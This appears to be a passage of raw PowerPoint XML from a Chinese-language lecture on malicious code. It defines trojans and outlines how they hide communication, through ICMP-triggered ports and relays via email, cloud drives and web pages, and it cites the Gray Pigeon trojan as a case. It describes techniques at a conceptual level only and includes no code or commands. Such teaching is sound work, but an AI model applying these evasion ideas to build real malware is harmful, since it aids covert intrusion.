              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它能提供一些有用的，或是仅仅令人感兴趣的功能，但是它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>还有用户所不知道的其他功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，例如在你不了解的情况下拷贝文件或窃取你的密码。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323517631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04948" y="1458255"/>
            <a:ext cx="7772400" cy="4485345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口监听的缺点：木马在等待和运行的过程中，始终向外界打开着一个端口，容易暴露。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不使用端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：利用非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在没有激活时是没有端口开放的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文，当出现特殊报文时，它打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口等待控制端的连接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、通信隐藏：非端口</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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="with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p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="10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pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马一定要直接与其控制者通信吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过中间方交换信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>电子邮件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网盘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、通信隐藏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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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2">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grpId="0"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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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2">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grpId="0"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>案例：灰鸽子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1396508"/>
            <a:ext cx="7457062" cy="4673216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190619560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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马技术小结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41990" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1401762"/>
            <a:ext cx="7854566" cy="4922837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>近年来，木马技术取得了较大的发展，目前已彻底摆脱了传统模式下植入方法原始、通信方式单一、隐蔽性差等不足。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>借助一些新技术，木马不再依赖于对用户进行简单的欺骗，也可以不必修改系统注册表，不开新端口，不在磁盘上保留新文件，甚至可以没有独立的进程，这些新特点使对木马的查杀变得愈加困难，与此同时却使得木马的功能得到了大幅提升。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224253617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zh-CN" altLang="en-US"/>
              <a:t>内容提纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64543" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1660525" y="722313"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="3338513"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64555" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="2762251"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64557" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="2794000"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64569" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1023937" y="3856038"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64570" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1839913" y="2686050"/>
            <a:ext cx="5497512" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的工作原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64571" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1101725" y="3887788"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64587" name="Line 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="4441825"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64583" name="Rectangle 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1028700" y="5100638"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64584" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1831976" y="3787775"/>
            <a:ext cx="5645150" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>木马的隐藏技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64585" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1082675" y="5141913"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64588" name="Line 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="5686425"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64550" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="1670051"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64551" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1836738" y="1633538"/>
            <a:ext cx="5726112" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64552" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="1701800"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
